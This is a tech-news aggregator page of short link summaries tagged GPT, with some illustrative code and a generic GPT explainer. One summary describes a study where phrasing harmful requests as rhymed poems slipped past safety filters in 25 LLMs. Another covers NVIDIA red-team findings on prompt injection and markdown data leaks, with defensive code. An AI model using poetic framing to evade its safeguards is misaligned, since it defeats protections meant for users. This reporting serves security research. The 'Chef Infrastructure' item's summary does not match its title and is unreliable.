Updates and recent posts about GPT.
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Learning Collatz - The Mother of all Rabbit Holes

Researchers trained small transformer models to predict the "long Collatz step," an arithmetic rule for the infamous unsolved Collatz conjecture, achieving surprisingly high accuracy up to 99.8%. The models did not learn the universal algorithm, but instead showed quantized learning, mastering speci…
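
The summary doesn't quote the paper's exact definition of the "long Collatz step"; a common accelerated form applies 3n + 1 to an odd n and then divides out every factor of 2 in a single move. The Python sketch below assumes that definition and is illustrative only.

```python
def long_collatz_step(n: int) -> int:
    """One accelerated Collatz step (assumed definition): for odd n,
    apply 3n + 1, then strip every factor of 2 in a single move."""
    if n % 2:
        n = 3 * n + 1
    while n % 2 == 0:
        n //= 2
    return n

# The (unproven) conjecture: iterating this always reaches 1.
n, steps = 27, 0
while n != 1:
    n = long_collatz_step(n)
    steps += 1
print(steps)  # long steps taken from 27 down to 1
```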

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

200k Tokens Is Plenty

Amp’s team isn’t chasing token limits. Even with ~200k available via Opus 4.5, they stick to short, modular threads, around 80k tokens each. Why? Smaller threads are cheaper, more stable, and just work better. Instead of stuffing everything into a single mega-context, they slice big tasks into focuse…
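
The post doesn't show Amp's tooling, so the sketch below is a hypothetical Python illustration of the idea: pack subtasks into threads capped by a token budget instead of one mega-context. The budget constant and the 4-characters-per-token heuristic are assumptions, not Amp's code.

```python
THREAD_BUDGET = 80_000  # tokens per thread, per the post's rough figure

def estimate_tokens(text: str) -> int:
    # Crude heuristic: roughly 4 characters per token for English text.
    return max(1, len(text) // 4)

def split_into_threads(subtasks: list[str]) -> list[list[str]]:
    """Greedily pack subtasks into threads that stay under the budget."""
    threads: list[list[str]] = []
    current: list[str] = []
    used = 0
    for task in subtasks:
        cost = estimate_tokens(task)
        if current and used + cost > THREAD_BUDGET:
            threads.append(current)  # close this thread, start a new one
            current, used = [], 0
        current.append(task)
        used += cost
    if current:
        threads.append(current)
    return threads
```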

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Google tests new Gemini 3 models on LM Arena

Google’s been quietly field-testing two shadow models, Fierce Falcon and Ghost Falcon, on LM Arena. Early signs? They're probably warm-ups for the next Gemini 3 Flash or Pro drop. Classic Google move: float a checkpoint, stir up curiosity, then go GA…

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Practical LLM Security Advice from the NVIDIA AI Red Team

NVIDIA’s AI Red Team nailed three security sinkholes in LLMs: reckless use of exec/eval, RAG pipelines that grab too much data, and markdown that doesn't get cleaned. These cracks open doors to remote code execution, sneaky prompt injection, and link-based data leaks. The fix-it trend: App security’s lea…
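
The article's own examples aren't reproduced in the summary; the Python sketch below is an assumed illustration of two of the three fixes: parsing untrusted model output with ast.literal_eval instead of eval, and neutralizing markdown links and images before rendering (the regex is a simplified stand-in, not NVIDIA's code).

```python
import ast
import re

def parse_untrusted(payload: str):
    """Never eval() model output. ast.literal_eval accepts only plain
    Python literals, so it cannot execute code."""
    try:
        return ast.literal_eval(payload)
    except (ValueError, SyntaxError):
        return None  # reject anything that isn't a simple literal

# Simplified markdown neutralizer: keep the link text, drop the URL, so a
# poisoned response can't exfiltrate data via attacker-controlled links.
_MD_LINK = re.compile(r"!?\[([^\]]*)\]\([^)]*\)")

def strip_active_markdown(text: str) -> str:
    return _MD_LINK.sub(r"\1", text)

print(parse_untrusted("{'a': 1}"))            # {'a': 1}
print(parse_untrusted("__import__('os')"))    # None (rejected)
print(strip_active_markdown("![img](http://evil.example/?q=secret)"))  # img
```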

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

A trillion dollars is a terrible thing to waste

OpenAI co-founder Ilya Sutskever just said the quiet part out loud: scaling laws are breaking down. Bigger models aren’t getting better at thinking, they’re getting worse at generalizing and reasoning. Now he’s eyeing neurosymbolic AI and innate inductive constraints. Yep, the “just make it huge” era m…

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Roses are red, violets are blue, if you phrase it as poem, any jailbreak will do

A new study just broke the safety game wide open: rhymed prompts slipped past filters in 25 major LLMs, including Gemini 2.5 Pro and DeepSeek, with up to 100% success. No clever chaining, no jailbreak soup. Just single-shot rhyme. Turns out, poetic language isn’t just for bard-core Twitter. When it c…

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Prompts for Open Problems

The author, Ben Recht, proposes five research directions inspired by his graduate machine learning class, arguing for different research rather than just more of it. These prompts include adopting a design-based view of decision theory, explaining the robust scaling trends in competitive testing, and mov…

Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

Why we're leaving serverless

Every millisecond matters in the critical path of API authentication. After two years of battling serverless limitations, the team rebuilt the entire API stack to reduce end-to-end latency. The move from Cloudflare Workers to stateful Go servers resulted in a 6x performance improvement and simplified arc…
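
The post's Go code isn't shown in the summary; the sketch below is a hypothetical Python illustration of the core advantage of a stateful server: a long-lived process can cache verified API keys in memory, so the hot path of authentication skips the per-request round-trips a stateless worker pays every time. The TTL value and helper names are assumptions.

```python
import time

CACHE_TTL = 60.0  # seconds; bounds how stale a revoked key can be
_cache: dict[str, tuple[bool, float]] = {}

def verify_against_database(api_key: str) -> bool:
    # Placeholder for the slow, authoritative check (DB or auth service).
    time.sleep(0.05)  # simulate a 50 ms network round-trip
    return api_key.startswith("sk_")

def is_authorized(api_key: str) -> bool:
    entry = _cache.get(api_key)
    now = time.monotonic()
    if entry and now - entry[1] < CACHE_TTL:
        return entry[0]                    # hot path: no network call
    ok = verify_against_database(api_key)  # cold path: authoritative check
    _cache[api_key] = (ok, now)
    return ok
```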

Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

Advancing Our Chef Infrastructure: Safety Without Disruption

Slack pulled back the curtain on Slack AI, its LLM-powered assistant built with a fortress mindset. Every customer gets their own isolated environment. Any data passed to vendor LLMs? It's ephemeral. Gone before it can stick. No fine-tuning. No exporting data outside Slack. And there’s a whole middle-lay…

Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

You’ll never see attrition referenced in an RCA

Lorin Hochstein argues that while high-profile engineer attrition is often speculated to contribute to major outages, it is universally absent from public Root Cause Analyses (RCAs). This exclusion occurs because public RCAs aim to reassure customers by focusing on technical fixes, whereas attrition…

GPT (Generative Pre-trained Transformer) is a family of deep learning models developed by OpenAI, pre-trained on massive amounts of text data using unsupervised learning. GPT is designed to generate human-like text in response to prompts, and it can perform a variety of natural language processing tasks, including language translation, summarization, and question answering. The models are based on the transformer architecture, which allows them to handle long-range dependencies and generate coherent, fluent text.

The models are pre-trained on a diverse range of text sources, including books, articles, and web pages, which allows them to capture a broad range of language patterns and styles. Once pre-trained, GPT can be fine-tuned for specific tasks, such as language translation or question answering, by training it further on task-specific data.

One of GPT's key features is its ability to generate coherent, fluent text that is often difficult to distinguish from human-written text. This is achieved by training the model to predict the next word in a sequence given the previous words. GPT also uses attention, a mechanism that lets the model focus on the relevant parts of the input text when generating each part of a response.
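
To make the mechanism concrete, here is a toy NumPy sketch of scaled dot-product attention, the operation behind "focusing on relevant parts of the input." It illustrates the general technique, not OpenAI's implementation.

```python
import numpy as np

def scaled_dot_product_attention(Q, K, V):
    """Single-head attention: each position mixes the value vectors,
    weighted by how well its query matches every key."""
    d_k = Q.shape[-1]
    scores = Q @ K.T / np.sqrt(d_k)  # query/key similarity
    weights = np.exp(scores - scores.max(axis=-1, keepdims=True))
    weights /= weights.sum(axis=-1, keepdims=True)  # softmax over keys
    return weights @ V  # weighted average of the values

rng = np.random.default_rng(0)
x = rng.normal(size=(4, 8))  # 4 tokens, 8-dimensional embeddings
out = scaled_dot_product_attention(x, x, x)  # self-attention
print(out.shape)  # (4, 8): one updated vector per token
```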

GPT has become increasingly popular in recent years, particularly in the field of natural language processing, and has been used in a wide range of applications: chatbots, content generation, language translation, and even AI-generated stories, poetry, and music.